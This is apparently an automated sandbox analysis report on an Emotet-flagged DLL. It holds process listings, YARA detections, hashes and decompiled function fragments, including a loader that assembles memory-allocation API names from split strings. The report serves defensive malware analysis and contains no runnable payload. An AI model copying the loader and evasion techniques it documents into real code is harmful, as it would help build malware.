MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 624, Parent PID: 6140

General

Target ID:	3
Start time:	09:10:07
Start date:	17/03/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\rad0767A.tmp.dll"
Imagebase:	0x7ff7131b0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.394237603.0000000000700000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 3480, Parent PID: 624

General

Target ID:	4
Start time:	09:10:10
Start date:	17/03/2023
Path:	C:\Windows\System32\regsvr32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\regsvr32.exe "C:\Windows\system32\CRCPqQPgWxqcgJu\zBLf.dll"
Imagebase:	0x7ff7131b0000
File size:	24064 bytes
MD5 hash:	D78B75FC68247E8A63ACBA846182740E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.633268738.00000000024A1000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_3, Description: Yara detected Emotet, Source: 00000004.00000002.632774627.0000000000BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000004.00000002.633113023.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: regsvr32.exePID: 624, Parent PID: 6140COMMON

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	8.9%
Signature Coverage:	7.1%
Total number of Nodes:	282
Total number of Limit Nodes:	8

Executed Functions

Function 006F0000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 006F0344
VirtualAlloc.KERNELBASE ref: 006F038A
VirtualAlloc.KERNELBASE ref: 006F03A4
VirtualProtect.KERNELBASE ref: 006F085C
RtlAddFunctionTable.KERNEL32 ref: 006F08E9

Strings

Virt, xrefs: 006F00C5
ativ, xrefs: 006F010F
Load, xrefs: 006F0095
tion, xrefs: 006F00F9
ualP, xrefs: 006F00CD
rote, xrefs: 006F00D5
onTa, xrefs: 006F0148
o, xrefs: 006F012E
lloc, xrefs: 006F00BD
ct, xrefs: 006F00DD
aryA, xrefs: 006F00A5
Virt, xrefs: 006F00AD
ddFu, xrefs: 006F013A
hIns, xrefs: 006F00EB
Flus, xrefs: 006F00E4
RtlA, xrefs: 006F0133
truc, xrefs: 006F00F2
GetN, xrefs: 006F0107
Libr, xrefs: 006F009D
ualA, xrefs: 006F00B5
temI, xrefs: 006F011F
Slee, xrefs: 006F0084
nf, xrefs: 006F0127
Cach, xrefs: 006F0100
eSys, xrefs: 006F0117
ncti, xrefs: 006F0141

Memory Dump Source

Source File: 00000003.00000002.394232178.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6f0000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 394283112-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: 6d1456dde12950fa9a4bb06a34560926c1ffc320791aa4127ee1618f57e81d36
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 39520530618B4C8BDB19DF18D8857BAB7E2FB54304F14462DE98BC7252DB34E946CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0074709C Relevance: 11.5, Strings: 9, Instructions: 237
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$, xrefs: 0074725F
8, xrefs: 00747172
_L, xrefs: 007474B0
W(P, xrefs: 0074727F
#Vk, xrefs: 0074731C
k|, xrefs: 00747446
xD, xrefs: 007470C9
U[, xrefs: 007472BB
_o, xrefs: 007470C1

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #Vk$$$8$U[$W(P$_L$_o$k|$xD
API String ID: 0-383957222
Opcode ID: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
Instruction ID: e72b5e28e5770599b69a38d0d014e98f65006602cc2aaf73b84de83a25e9e2bc
Opcode Fuzzy Hash: 3fcaeefa4f3a6a4b2ee736f46ed5ab809e6beb52b42741c15c6946b5de4ec314
Instruction Fuzzy Hash: 3AC1CD71519780AFD388CF28C58A91BBBF0FBD4748F906A1DF89686260D7B4D949CF02

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010C10 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 78
librarymemorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrFindResource_U.NTDLL ref: 0000000180010CCB
LdrAccessResource.NTDLL ref: 0000000180010CEB
NtAllocateVirtualMemory.NTDLL ref: 0000000180010D19

Strings

@, xrefs: 0000000180010CF5
LXGUM, xrefs: 0000000180010C74
ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk, xrefs: 0000000180010C3B

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AccessAllocateFindMemoryResourceResource_Virtual
String ID: @$LXGUM$ad5zS&E7DS(ke9?+qbAC5tqx<Y<h0!QB4H3bk
API String ID: 2485490239-3005932707
Opcode ID: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
Instruction ID: 10e411743ffb1a55a6adb62272a00c62f4f605c25ab8d9ba5168281e261d5f46
Opcode Fuzzy Hash: 72763dadedb1f7e12bf326a7682b4cc9f3b8809a7beac6fa455c8e22944c1181
Instruction Fuzzy Hash: 0F41F976218B8486D795CB14F49039AB7B4F388794F505116FADA83BA8DF7DC608CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00737D6C Relevance: 7.7, Strings: 6, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

)y_, xrefs: 00737F29
3`d!, xrefs: 00737DD8
GX, xrefs: 00737D80
=, xrefs: 00737D8E
)s, xrefs: 00737FA2
lo, xrefs: 00737D79

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: )s$)y_$3`d!$GX$lo$=
API String ID: 0-308291206
Opcode ID: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
Instruction ID: 56241bcc6ca1c12db65d8080260bbe225d900293cca06beb0e04a1d44b4ba830
Opcode Fuzzy Hash: fde852a4840d2e352ca3eb00ee2f42bd1f44b3ef619014c8955ce582878b56b5
Instruction Fuzzy Hash: 4D912AB150074A8BEB58CF28C88A4DE3FA1FB58358F65422CFC4AA6290D778D595CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0074A000 Relevance: 7.7, Strings: 6, Instructions: 154
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

F, xrefs: 0074A03A
/Q, xrefs: 0074A056
F8, xrefs: 0074A125
Z, xrefs: 0074A0BB
;, xrefs: 0074A11E
KT, xrefs: 0074A0FA

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: /Q$;$F8$KT$F$Z
API String ID: 0-1951868783
Opcode ID: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
Instruction ID: fdd1122faef2d0261e4c4dd121ff5d067f6eacde0ef3a443f4b52587e5093afe
Opcode Fuzzy Hash: 1dba0b1f5f7bf25f1a94850d34f322108ec8c8f6f4ebff0ec6ff6f465611ff96
Instruction Fuzzy Hash: BE6147B1E147098FCB48CFA8D88A8DEBBB1FB58314F10821DE846A7290D7749995CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010AC0 Relevance: 4.6, APIs: 3, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E00000001180010AC0(long long _a8, intOrPtr _a16, long long _a24) {
				long long _v32;
				long long _v40;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _t15;
				long long _t19;
				long long _t20;

				_a24 = _t20;
				_a16 = _t15;
				_a8 = _t19;
				_v56 = _a16;
				if (_v56 == 1) goto 0x80010ae6;
				goto 0x80010bf4;
				 *0x80022ca0 = _a8;
				_v52 = 0x904;
				_v48 = 0xf9e;
				_v40 = 0;
				_v32 = 0;
				if (E00000001180010DB0(_a16) == 0) goto 0x80010b28;
				ExitProcess(??);
			}

0x180010ac0
0x180010ac5
0x180010ac9
0x180010ad6
0x180010adf
0x180010ae1
0x180010aeb
0x180010af2
0x180010afa
0x180010b02
0x180010b0b
0x180010b1b
0x180010b22

APIs

ExitProcess.KERNEL32 ref: 0000000180010B22

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
Instruction ID: 35b30a5bd3bbc3bfa3955963e6b6c4c9d1147ff83b5bb424c40f1a31c42fa1fb
Opcode Fuzzy Hash: e7061396d7e3d43570edbd3d19f5eed90c055825c823b852da9f6b8b51899770
Instruction Fuzzy Hash: AE311671119B489AE782DF54F85438AB7A0F7983D4F608215F6A907BA4CFBDC24CCB40

Uniqueness

Uniqueness Score: -1.00%

Function 0073CC14 Relevance: 4.1, Strings: 3, Instructions: 312
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0c, xrefs: 0073CEBC
\, xrefs: 0073D130
c2&, xrefs: 0073CD1F

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 0c$\$c2&
API String ID: 0-1001447681
Opcode ID: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
Instruction ID: 4438beab00c766664f2a7a08f5d8d0be7321fec4d5e8c1abafd51a44c14f67a2
Opcode Fuzzy Hash: 77759940156d6b552e519a0717cd81e7aca00c005acef3af4df6aa899143340c
Instruction Fuzzy Hash: AE02E6715083C8CBEBBECF64C889ADA7BADFB44708F10521DEA4A9E258DB745744CB41

Uniqueness

Uniqueness Score: -1.00%

Function 00738BC8 Relevance: 4.0, Strings: 3, Instructions: 213
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

M, xrefs: 00738F2D
N5, xrefs: 00738C11
.f, xrefs: 00738E08

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .f$M$N5
API String ID: 0-1477915503
Opcode ID: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
Instruction ID: f4506d7bcbb1492cdaab79765df4767828b70e7821b7a9aaf5ca2d70049259d9
Opcode Fuzzy Hash: 8d1225c7070edb932c8417e1bce8c420d426fdb0b99d3cf29e08fc417a96cbbc
Instruction Fuzzy Hash: FEA160705197449FD7E8DF28C8C959EBBE0FB94304F906A1DF8869B2A0CB78D945CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00748FC8 Relevance: 1.5, Strings: 1, Instructions: 279
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

A]jN, xrefs: 00749216

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: A]jN
API String ID: 0-1761522205
Opcode ID: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
Instruction ID: 5df0604ba80eb93bfca29cca2a312bd627ddd7579ff9d377ea3875bf63aba9b3
Opcode Fuzzy Hash: 43702ad7ebc926fc841c635a5fc759035faaa4ad2df4e1132c12a3653d9fa51d
Instruction Fuzzy Hash: C6D1E4B1D0060A8FDF48DFA8C48A4AEBBB1FB58304F11422DD516BB290D7785A46CFD1

Uniqueness

Uniqueness Score: -1.00%

Function 0073263C Relevance: 1.4, Strings: 1, Instructions: 135COMMON

Download Yara Rule

Strings

C, xrefs: 00732836

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: C
API String ID: 0-3705061908
Opcode ID: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
Instruction ID: d28a233f248adf134e37d9b1b03e47c63eababc583530b4d5471050845282a3d
Opcode Fuzzy Hash: 762938c9acd95b28f04d4807fb9ee99926cdc57d0bffae28badc71fa18101beb
Instruction Fuzzy Hash: E461D27151C7848BD768DF28C18A40FBBF1FBD6748F000A1DF69A862A0D7B6D958CB42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000147C Relevance: 12.2, APIs: 8, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0000000118000147C(void* __edx) {
				void* _t5;

				_t5 = __edx;
				if (_t5 == 0) goto 0x800014bd;
				if (_t5 == 0) goto 0x800014b1;
				if (_t5 == 0) goto 0x800014a4;
				if (__edx == 1) goto 0x8000149d;
				return 1;
			}

0x180001480
0x180001482
0x180001487
0x18000148c
0x180001491
0x18000149c

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 00000001800014A4
__scrt_acquire_startup_lock.LIBCMT ref: 00000001800014F6
_RTC_Initialize.LIBCMT ref: 0000000180001524
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000000018000154A
__scrt_release_startup_lock.LIBCMT ref: 0000000180001575

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
Instruction ID: c036cf0e1e542974e7afb98f421e14e504817ee7e551922961311e630d73ddb8
Opcode Fuzzy Hash: f481a242433e045de9421f6a540d64c2f1c4067185df5e2b4ea36506bf633cb0
Instruction Fuzzy Hash: 5881C370A04A4DCEFBD7DB65A8413D932A0AB9D7C2F54C125B909477A6DF38C74D8700

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800063CC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E000000011800063CC(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t31;
				intOrPtr _t37;
				void* _t50;
				intOrPtr* _t67;
				long long _t73;
				void* _t75;
				long long _t89;
				signed int _t90;
				void* _t91;
				intOrPtr* _t92;
				void* _t95;
				void* _t98;

				_t98 = __r8;
				_t75 = __rcx;
				_a8 = __rbx;
				r14d = __ecx;
				if (__ecx == 0) goto 0x8000653f;
				_t2 = _t75 - 1; // -1
				if (_t2 - 1 <= 0) goto 0x8000640a;
				E000000011800086F4(_t2 - 1, __rax);
				_t3 = _t90 + 0x16; // 0x16
				 *__rax = _t3;
				E000000011800085B8();
				goto 0x8000653f;
				E00000001180009CD8(_t50, __rbx, _t91);
				r8d = 0x104;
				E000000011800093BC(_t50, 0x80022250, _t75, 0x80022250, _t90, _t91, _t98);
				_t92 =  *0x80022630; // 0x5a3350
				 *0x80022610 = 0x80022250;
				if (_t92 == 0) goto 0x8000643e;
				if ( *_t92 != dil) goto 0x80006441;
				_t67 =  &_a32;
				_a24 = _t90;
				_v56 = _t67;
				r8d = 0;
				_a32 = _t90;
				_t31 = E000000011800061A4(0x80022250, 0x80022250, 0x80022250, 0x80022250, _t95, _t98,  &_a24);
				r8d = 1;
				E0000000118000636C(_t31, _a24, _a32, _t98); // executed
				_t73 = _t67;
				if (_t67 != 0) goto 0x80006499;
				E000000011800086F4(_t67, _t67);
				 *_t67 = 0xc;
				E0000000118000878C(_t67, _a24);
				goto 0x80006403;
				_v56 =  &_a32;
				E000000011800061A4(_t73, 0x80022250, _t73, 0x80022250, _t95, _t67 + _a24 * 8,  &_a24);
				if (r14d != 1) goto 0x800064d1;
				_t37 = _a24 - 1;
				 *0x80022620 = _t73;
				 *0x80022618 = _t37;
				goto 0x8000653a;
				_a16 = _t90;
				0x80009298();
				if (_t37 == 0) goto 0x80006500;
				E0000000118000878C( &_a32, _a16);
				_a16 = _t90;
				E0000000118000878C( &_a32, _t73);
				goto 0x8000653f;
				_t89 = _a16;
				if ( *_t89 == _t90) goto 0x8000651b;
				if ( *((intOrPtr*)(_t89 + 8)) != _t90) goto 0x8000650f;
				 *0x80022618 = 0;
				_a16 = _t90;
				 *0x80022620 = _t89;
				E0000000118000878C(_t89 + 8, _t90 + 1);
				_a16 = _t90;
				E0000000118000878C(_t89 + 8, _t73);
				return _t37;
			}

0x1800063cc
0x1800063cc
0x1800063cc
0x1800063e1
0x1800063e6
0x1800063ec
0x1800063f2
0x1800063f4
0x1800063f9
0x1800063fc
0x1800063fe
0x180006405
0x18000640a
0x180006416
0x180006421
0x180006426
0x18000642d
0x180006437
0x18000643c
0x180006441
0x180006445
0x18000644d
0x180006452
0x180006455
0x18000645e
0x180006467
0x180006474
0x180006479
0x18000647f
0x180006481
0x18000648d
0x18000648f
0x180006494
0x1800064ab
0x1800064b0
0x1800064b9
0x1800064be
0x1800064c0
0x1800064c7
0x1800064cf
0x1800064d5
0x1800064dc
0x1800064e5
0x1800064eb
0x1800064f3
0x1800064f7
0x1800064fe
0x180006500
0x18000650d
0x180006519
0x18000651b
0x180006523
0x180006527
0x18000652e
0x180006536
0x18000653a
0x180006551

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00000001800063FE

Part of subcall function 000000018000878C: HeapFree.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087A2
Part of subcall function 000000018000878C: GetLastError.KERNEL32(?,?,00000000,000000018000E6BE,?,?,?,000000018000E6FB,?,?,00000000,000000018000BED5,?,?,?,000000018000BE07), ref: 00000001800087AC

Strings

C:\Windows\system32\regsvr32.exe, xrefs: 000000018000640F
P3Z, xrefs: 0000000180006426

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFreeHeapLast_invalid_parameter_noinfo
String ID: C:\Windows\system32\regsvr32.exe$P3Z
API String ID: 2724796048-3893123828
Opcode ID: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
Instruction ID: 22eee0821ddd0031139ae0324638ff7f0a91ab2d69636e8f5a4f0751baae73e2
Opcode Fuzzy Hash: 6ab70c768575c3897d89b9d56517bfe78e9b9e214d555ff294bd8044b7c9c220
Instruction Fuzzy Hash: C4418B36601B1896FB97DF65A8403EC3795FB4CBC4F588025FE4A43BAADE34C6898340

Uniqueness

Uniqueness Score: -1.00%

Function 00743988 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 105
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00743AF8

Strings

li, xrefs: 00743A44

Memory Dump Source

Source File: 00000003.00000002.394265744.0000000000731000.00000020.00001000.00020000.00000000.sdmp, Offset: 00731000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_731000_regsvr32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID: li
API String ID: 963392458-3170889640
Opcode ID: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
Instruction ID: 86f07da87f41df90cffaf3c3b8b29052b3c79bb328378359c1584c532f3adb22
Opcode Fuzzy Hash: df447d1959c748b5d8cf34ebfef7c4b31b83bdbcb52bf56f40cb8f0245456118
Instruction Fuzzy Hash: CC41E57091CB848FDBA4DF18D08979AB7E0FB98315F20495DE48CC7296CB789884CB86

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D26C Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0000000118000D26C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x8000d2b4;
				E000000011800086F4(__ecx - 0x2000, __rax);
				 *__rax = 9;
				E000000011800085B8();
				return 9;
			}

0x18000d26c
0x18000d271
0x18000d276
0x18000d289
0x18000d28b
0x18000d295
0x18000d297
0x18000d2b3

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000000018000D297

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
Instruction ID: 290c2a04846c9b039a5155463e3184fcb060a742c36b4207bfb39a2b49eb85f2
Opcode Fuzzy Hash: b2bec9f1c83fd2e5dff941a4990122d97467662781677e8ba2cfdbb0e4efa737
Instruction Fuzzy Hash: 3911AC3210468C82F383DF14E8507D9B7A4FB5C7C0F058426FA9547BAADF38CA199B50

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008714 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 44%

			E00000001180008714(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x80008733;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x80008776;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8000875a;
				if (E0000000118000C08C() == 0) goto 0x80008776;
				if (E0000000118000ABF8(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x80008776;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x80008745;
				goto 0x80008783;
				E000000011800086F4(_t22, _t22);
				 *_t22 = 0xc;
				return 0;
			}

0x180008714
0x180008723
0x180008727
0x180008727
0x180008731
0x18000873f
0x180008743
0x18000874c
0x180008758
0x180008769
0x180008772
0x180008774
0x180008776
0x18000877b
0x180008788

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,0000000180007F92,?,?,0000C11A2227B184,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000), ref: 0000000180008769

Memory Dump Source

Source File: 00000003.00000002.394508478.0000000180001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000003.00000002.394503670.0000000180000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394525690.0000000180016000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394535183.0000000180021000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.394540062.0000000180023000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
Instruction ID: 66bea78d34406d615fa8c08e42eaa36a882f8058afe23dfc71e7ff7acb685faa
Opcode Fuzzy Hash: 7cf3c04cd0eb283655c87112c6735f3b789bd4b36bb41325690c7ae62c9b4c65
Instruction Fuzzy Hash: A1F06D74309A0881FED7D7A599003D522D16F5CBC0F2CD4302D4E863DAEE1CC788A320

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180001268 Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 71%

			E00000001180001268(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;

				_t2 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				 *0x80021ae0 =  ==  ? 1 :  *0x80021ae0 & 0x000000ff;
				E00000001180001A80(1, _t12, __ecx, _t17, _t18, _t19, _t20, _t21);
				if (E00000001180002A08() != 0) goto 0x80001297;
				goto 0x800012ab; // executed
